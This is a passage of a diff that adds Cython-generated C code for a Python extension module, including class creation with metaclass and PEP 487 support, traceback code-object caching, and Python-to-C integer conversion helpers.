*modname, PyObject *doc) { + PyObject *ns; + if (metaclass) { + PyObject *prep = __Pyx_PyObject_GetAttrStrNoError(metaclass, __pyx_n_s_prepare); + if (prep) { + PyObject *pargs[3] = {NULL, name, bases}; + ns = __Pyx_PyObject_FastCallDict(prep, pargs+1, 2 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET, mkw); + Py_DECREF(prep); + } else { + if (unlikely(PyErr_Occurred())) + return NULL; + ns = PyDict_New(); + } + } else { + ns = PyDict_New(); + } + if (unlikely(!ns)) + return NULL; + if (unlikely(PyObject_SetItem(ns, __pyx_n_s_module, modname) < 0)) goto bad; +#if PY_VERSION_HEX >= 0x03030000 + if (unlikely(PyObject_SetItem(ns, __pyx_n_s_qualname, qualname) < 0)) goto bad; +#else + CYTHON_MAYBE_UNUSED_VAR(qualname); +#endif + if (unlikely(doc && PyObject_SetItem(ns, __pyx_n_s_doc, doc) < 0)) goto bad; + return ns; +bad: + Py_DECREF(ns); + return NULL; +} +#if PY_VERSION_HEX < 0x030600A4 && CYTHON_PEP487_INIT_SUBCLASS +static int __Pyx_SetNamesPEP487(PyObject *type_obj) { + PyTypeObject *type = (PyTypeObject*) type_obj; + PyObject *names_to_set, *key, *value, *set_name, *tmp; + Py_ssize_t i = 0; +#if CYTHON_USE_TYPE_SLOTS + names_to_set = PyDict_Copy(type->tp_dict); +#else + { + PyObject *d = PyObject_GetAttr(type_obj, __pyx_n_s_dict); + names_to_set = NULL; + if (likely(d)) { + PyObject *names_to_set = PyDict_New(); + int ret = likely(names_to_set) ? PyDict_Update(names_to_set, d) : -1; + Py_DECREF(d); + if (unlikely(ret < 0)) + Py_CLEAR(names_to_set); + } + } +#endif + if (unlikely(names_to_set == NULL)) + goto bad; + while (PyDict_Next(names_to_set, &i, &key, &value)) { + set_name = __Pyx_PyObject_LookupSpecialNoError(value, __pyx_n_s_set_name); + if (unlikely(set_name != NULL)) { + tmp = __Pyx_PyObject_Call2Args(set_name, type_obj, key); + Py_DECREF(set_name); + if (unlikely(tmp == NULL)) { + __Pyx_TypeName value_type_name = + __Pyx_PyType_GetName(Py_TYPE(value)); + __Pyx_TypeName type_name = __Pyx_PyType_GetName(type); + PyErr_Format(PyExc_RuntimeError, +#if PY_MAJOR_VERSION >= 3 + "Error calling __set_name__ on '" __Pyx_FMT_TYPENAME "' instance %R " "in '" __Pyx_FMT_TYPENAME "'", + value_type_name, key, type_name); +#else + "Error calling __set_name__ on '" __Pyx_FMT_TYPENAME "' instance %.100s in '" __Pyx_FMT_TYPENAME "'", + value_type_name, + PyString_Check(key) ? PyString_AS_STRING(key) : "?", + type_name); +#endif + goto bad; + } else { + Py_DECREF(tmp); + } + } + else if (unlikely(PyErr_Occurred())) { + goto bad; + } + } + Py_DECREF(names_to_set); + return 0; +bad: + Py_XDECREF(names_to_set); + return -1; +} +static PyObject *__Pyx_InitSubclassPEP487(PyObject *type_obj, PyObject *mkw) { +#if CYTHON_USE_TYPE_SLOTS && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + PyTypeObject *type = (PyTypeObject*) type_obj; + PyObject *mro = type->tp_mro; + Py_ssize_t i, nbases; + if (unlikely(!mro)) goto done; + (void) &__Pyx_GetBuiltinName; + Py_INCREF(mro); + nbases = PyTuple_GET_SIZE(mro); + assert(PyTuple_GET_ITEM(mro, 0) == type_obj); + for (i = 1; i < nbases-1; i++) { + PyObject *base, *dict, *meth; + base = PyTuple_GET_ITEM(mro, i); + dict = ((PyTypeObject *)base)->tp_dict; + meth = __Pyx_PyDict_GetItemStrWithError(dict, __pyx_n_s_init_subclass); + if (unlikely(meth)) { + descrgetfunc f = Py_TYPE(meth)->tp_descr_get; + PyObject *res; + Py_INCREF(meth); + if (likely(f)) { + res = f(meth, NULL, type_obj); + Py_DECREF(meth); + if (unlikely(!res)) goto bad; + meth = res; + } + res = __Pyx_PyObject_FastCallDict(meth, NULL, 0, mkw); + Py_DECREF(meth); + if (unlikely(!res)) goto bad; + Py_DECREF(res); + goto done; + } else if (unlikely(PyErr_Occurred())) { + goto bad; + } + } +done: + Py_XDECREF(mro); + return type_obj; +bad: + Py_XDECREF(mro); + Py_DECREF(type_obj); + return NULL; +#else + PyObject *super_type, *super, *func, *res; +#if CYTHON_COMPILING_IN_PYPY && !defined(PySuper_Type) + super_type = __Pyx_GetBuiltinName(__pyx_n_s_super); +#else + super_type = (PyObject*) &PySuper_Type; + (void) &__Pyx_GetBuiltinName; +#endif + super = likely(super_type) ? __Pyx_PyObject_Call2Args(super_type, type_obj, type_obj) : NULL; +#if CYTHON_COMPILING_IN_PYPY && !defined(PySuper_Type) + Py_XDECREF(super_type); +#endif + if (unlikely(!super)) { + Py_CLEAR(type_obj); + goto done; + } + func = __Pyx_PyObject_GetAttrStrNoError(super, __pyx_n_s_init_subclass); + Py_DECREF(super); + if (likely(!func)) { + if (unlikely(PyErr_Occurred())) + Py_CLEAR(type_obj); + goto done; + } + res = __Pyx_PyObject_FastCallDict(func, NULL, 0, mkw); + Py_DECREF(func); + if (unlikely(!res)) + Py_CLEAR(type_obj); + Py_XDECREF(res); +done: + return type_obj; +#endif +} +#endif +static PyObject *__Pyx_Py3ClassCreate(PyObject *metaclass, PyObject *name, PyObject *bases, + PyObject *dict, PyObject *mkw, + int calculate_metaclass, int allow_py2_metaclass) { + PyObject *result; + PyObject *owned_metaclass = NULL; + PyObject *margs[4] = {NULL, name, bases, dict}; + if (allow_py2_metaclass) { + owned_metaclass = PyObject_GetItem(dict, __pyx_n_s_metaclass); + if (owned_metaclass) { + metaclass = owned_metaclass; + } else if (likely(PyErr_ExceptionMatches(PyExc_KeyError))) { + PyErr_Clear(); + } else { + return NULL; + } + } + if (calculate_metaclass && (!metaclass || PyType_Check(metaclass))) { + metaclass = __Pyx_CalculateMetaclass((PyTypeObject*) metaclass, bases); + Py_XDECREF(owned_metaclass); + if (unlikely(!metaclass)) + return NULL; + owned_metaclass = metaclass; + } + result = __Pyx_PyObject_FastCallDict(metaclass, margs+1, 3 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET, +#if PY_VERSION_HEX < 0x030600A4 + (metaclass == (PyObject*)&PyType_Type) ? NULL : mkw +#else + mkw +#endif + ); + Py_XDECREF(owned_metaclass); +#if PY_VERSION_HEX < 0x030600A4 && CYTHON_PEP487_INIT_SUBCLASS + if (likely(result) && likely(PyType_Check(result))) { + if (unlikely(__Pyx_SetNamesPEP487(result) < 0)) { + Py_CLEAR(result); + } else { + result = __Pyx_InitSubclassPEP487(result, mkw); + } + } +#else + (void) &__Pyx_GetBuiltinName; +#endif + return result; +} + +/* CyFunctionClassCell */ +static int __Pyx_CyFunction_InitClassCell(PyObject *cyfunctions, PyObject *classobj) { + Py_ssize_t i, count = PyList_GET_SIZE(cyfunctions); + for (i = 0; i < count; i++) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + PyList_GET_ITEM(cyfunctions, i); +#else + PySequence_ITEM(cyfunctions, i); + if (unlikely(!m)) + return -1; +#endif + __Pyx_CyFunction_SetClassObj(m, classobj); +#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF((PyObject*)m); +#endif + } + return 0; +} + +/* CLineInTraceback */ +#ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ +#include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +/* CIntFromPyVerify */ +#define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* CIntFromPy */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(int) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(int) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(int) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(int), + little, !is_unsigned); + } +} + +/* CIntFromPy */ +static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const size_t neg_one = (size_t) -1, const_zero = (size_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(size_t) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(size_t, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (size_t) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << 